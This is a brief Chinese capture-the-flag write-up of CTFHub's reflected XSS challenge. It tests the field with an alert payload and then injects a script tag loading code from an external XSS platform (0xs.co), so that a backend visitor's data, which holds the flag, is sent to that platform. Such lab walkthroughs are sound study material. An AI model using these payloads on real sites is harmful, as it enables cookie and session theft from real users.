反射型XSS

查看页面：

XSS_Reflex1

第一个输入框与下面Hello后的内容相同，猜测可以通过该输入，改变页面内容。

进行测试：

<script>alert(1)</script>

XSS_Reflex2

默认使用get方式发送Payload，成功弹窗。

经过测试，第二个输入框输入URL时，返回SUCCESS，猜测在后台进行访问。

尝试使用XSS Platform，在第一个框中输入包含脚本网址：<script src=//0xs.co/YGlQP></script>。

通过第二个框，访问包含了XSS脚本的本页面URL：

XSS_Reflex3

于平台获得FLAG。

XSS_Reflex4

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CTFHUB-技能树-Web-XSS-反射型 ctfhub技能树—彩蛋 CTFHub web技能树 RCE CTFHub题解-技能树-Web-SQL注入(整数型、字符型、报错注入、布尔盲注)【一】 CTFHUB技能树-SSRF【持续更新】【CTF】CTFHub 技能树彩蛋 writeup CTFHub_技能树_文件上传 ctfhub技能树—文件上传—前端验证 ctfhub技能树—文件上传—MIME绕过 CTFHUB-技能树-Web-SSRF(上)